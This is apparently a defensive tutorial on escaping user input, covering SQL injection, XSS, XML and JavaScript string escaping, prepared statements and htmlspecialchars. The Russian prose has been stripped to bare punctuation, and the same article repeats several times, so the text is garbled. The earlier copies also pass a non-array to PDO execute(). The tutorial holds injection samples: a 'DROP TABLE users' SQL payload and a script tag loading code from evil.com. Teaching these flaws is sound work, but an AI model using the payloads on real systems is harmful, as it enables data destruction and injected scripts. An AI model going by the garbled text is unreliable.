, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |i╦Иsk─Бp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'";
$result = mysql_query($query);
$name = $_POST['name'];
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
, . $_POST['name']
- , -. SQL-, , . SQL "" .
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
: XSS . , HTML.
<div class="post">
  <p class="meta">
    Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo $post['body']; ?>
  </p>
</div>
<div class="post">
  <p class="meta">
    Posted by Plato on January 2, 15:31
  </p>
  <p class="body">
    I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat."
  </p>
</div>
<div class="post">
  <p class="meta">
    Posted by Pascal on November 23, 04:12
  </p>
  <p class="body">
    Basic math tells us that if x < n and y > n, x cannot be larger than y.
  </p>
</div>
<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>
  </p>
</div>
, , ? - javascript ? , , , . .
$name = $_POST['name'];
$name = mysql_real_escape_string($name);
$query = "SELECT phone_number FROM users WHERE name = '$name'";
$result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
<div class="post">
  <p class="meta">
    Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?>
  </p>
  <p class="body">
    <?php echo htmlspecialchars($post['body']); ?>
  </p>
</div>
htmlspecialchars
<div class="post">
  <p class="meta">
    Posted by JackTR on July 18, 12:56
  </p>
  <p class="body">
    &lt;script src=&quot;http://evil.com/dangerous.js&quot; type=&quot;text/javascript&quot; charset=&quot;utf-8&quot;&gt;&lt;/script&gt;
  </p>
</div>
, , , "". HTML .
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". .
Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?');
// execute() takes the parameter values as an array; the driver sends them separately from the SQL text
$stmt->execute([$_POST['name']]);
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
<?xml version="1.0" encoding="UTF-8" ?>
<article>
  <author>Homo Sapiens</author>
  <contents>
    Basic math tells us that if x < n and y > n, x cannot be larger than y.
  </contents>
</article>
, . "<" "&lt;", ">" - "&gt;".
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - "&", .. : "&<"
XML - "" . , :
var name = "Homo Sapiens";
var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
var name = "Homo Sapiens";
var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
var name = "Homo Sapiens";
var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
var name = "Homo Sapiens";
var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
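The four escaping rules the article walks through (SQL literal, HTML, XML, JavaScript string), collected into one runnable piece. This is an added example, not the article's own code: sqlEscape follows the rules of mysql_real_escape_string and htmlEscape those of htmlspecialchars() with default flags, while rawQuery, escapedQuery, renderPost and countStatements are helper names invented here. It runs the article's inputs (Alex, Mc'Donalds, Joe'; DROP TABLE users; --, the JackTR post, Plato's quote) through each escaper and shows why escaping for the wrong language, HTML rules on a SQL value, still leaves the query broken.

```javascript
// Added example, not code from the original article.
// One escaper per target language; each escapes the escape character first.

// SQL: a value placed inside a single-quoted MySQL string literal.
// Backslash goes first, otherwise the backslashes added for the quotes
// would themselves be doubled afterwards.
function sqlEscape(value) {
  return String(value)
    .replace(/\\/g, '\\\\')
    .replace(/\0/g, '\\0')
    .replace(/\n/g, '\\n')
    .replace(/\r/g, '\\r')
    .replace(/\x1a/g, '\\Z')
    .replace(/'/g, "\\'")
    .replace(/"/g, '\\"');
}

// HTML text and attribute values: the characters htmlspecialchars()
// replaces. '&' goes first so the entities produced here are not re-escaped.
function htmlEscape(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;');
}

// XML character data: the same idea with the three characters XML reserves.
function xmlEscape(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// JavaScript: the inside of a double-quoted string literal.
function jsStringEscape(value) {
  return String(value)
    .replace(/\\/g, '\\\\')
    .replace(/"/g, '\\"')
    .replace(/\n/g, '\\n')
    .replace(/\r/g, '\\r');
}

// The article's query, built by concatenation, with and without escaping.
function rawQuery(name) {
  return "SELECT phone_number FROM users WHERE name = '" + name + "'";
}
function escapedQuery(name) {
  return rawQuery(sqlEscape(name));
}

// The article's post template with every dynamic value passed through
// htmlEscape. The date is taken as an already formatted string here.
function renderPost(post) {
  return '<div class="post">' +
    '<p class="meta">Posted by ' + htmlEscape(post.username) +
    ' on ' + htmlEscape(post.date) + '</p>' +
    '<p class="body">' + htmlEscape(post.body) + '</p>' +
    '</div>';
}

// How many statements a MySQL-style parser sees in the query text: one plus
// the number of ';' outside single-quoted literals, where a backslash escapes
// the next character. Shows that a value escaped for HTML instead of SQL
// still splits the query.
function countStatements(sql) {
  let inString = false;
  let count = 1;
  for (let i = 0; i < sql.length; i++) {
    const c = sql[i];
    if (inString) {
      if (c === '\\') i++;               // skip the escaped character
      else if (c === "'") inString = false;
    } else if (c === "'") {
      inString = true;
    } else if (c === ';') {
      count++;
    }
  }
  return count;
}

// Constructed inputs: the same values the article uses.
function demo() {
  for (const name of ['Alex', "Mc'Donalds", "Joe'; DROP TABLE users; --"]) {
    console.log('raw      :', rawQuery(name), '=>', countStatements(rawQuery(name)), 'statement(s)');
    console.log('sql-esc  :', escapedQuery(name), '=>', countStatements(escapedQuery(name)), 'statement(s)');
    console.log('html-esc :', rawQuery(htmlEscape(name)), '=>', countStatements(rawQuery(htmlEscape(name))), 'statement(s)');
  }
  const post = { username: 'JackTR', date: 'July 18, 12:56',
    body: '<script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script>' };
  console.log(renderPost(post));
  console.log(xmlEscape('&lt;'));   // escaping the escape itself
  console.log('var contents = "' + jsStringEscape('Plato is said to once have said "Lorem ipsum dolor sit amet".') + '";');
}
demo();
```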
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
